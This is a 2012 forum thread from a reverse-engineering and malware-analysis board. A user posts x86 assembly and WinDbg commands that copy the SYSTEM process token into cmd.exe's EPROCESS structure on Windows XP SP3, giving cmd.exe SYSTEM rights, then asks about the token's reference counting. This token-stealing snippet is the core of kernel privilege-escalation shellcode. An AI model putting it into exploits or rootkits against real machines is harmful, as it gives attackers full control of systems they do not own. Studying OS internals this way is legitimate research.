A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about kernel-mode development.
 #16245  by R00tKit
 Wed Oct 24, 2012 6:11 am
hi

this code is old method to gain system token to our process(example cmd.exe )
i know _EX_FAST_REF is union and last 3 bit must be 0 so token field point to real token object ( in x64 its 4 bit)
Code: Select all
mov edi, [System_EPROCESS+WINXP_TOKEN_OFFSET]     ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                   ; Must be aligned by 8
mov [CMD_EPROCESS+WINXP_TOKEN_OFFSET], edi     ; We replace the token of the cmd process
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID
 
so what is problem if we wholly change _EX_FAST_REF of cmd with _EX_FAST_REF of system ?

code:
Code: Select all
mov   ebx,[System_EPROCESS+WINXP_TOKEN_OFFSET]
mov   [CMD_EPROCESS+WINXP_TOKEN_OFFSET] ,ebx ; now  cmd EPROCESS _EX_FAST_REF  must point  to system _EX_FAST_REF 
i do it and it work prefect without any problem ( after this cmd.exe get system account )
i asked EP why closing cme.exe dont lead system to crash ( system must free closed object , so system process token now must point to invalid object )
he say
System will not free this token object because it RefCount will not be counted as 0 after cmd.exe exits. Look at "System" process token. Every of them has at least 1 reference
why system token have big RefCount number ?

what i do Exactly in windbg
81eef138 = system EPROCESS
_EX_FAST_REF offset in XPSP3 is 0x0c8
Code: Select all
dpa 81eef138+0x0c8

result => e1000805

81f49620 = cmd.exe EPROCESS
Code: Select all
ep 81f49620+0x0c8  e1000805
thanks
 #16250  by R00tKit
 Wed Oct 24, 2012 1:00 pm
thanks to EP

1. internally windows does unmasking when accessing this object so there is no diff what you copy
2. look at objects, all of them have security descriptors. now take wrk and look how system threads created and when their primary token referenced.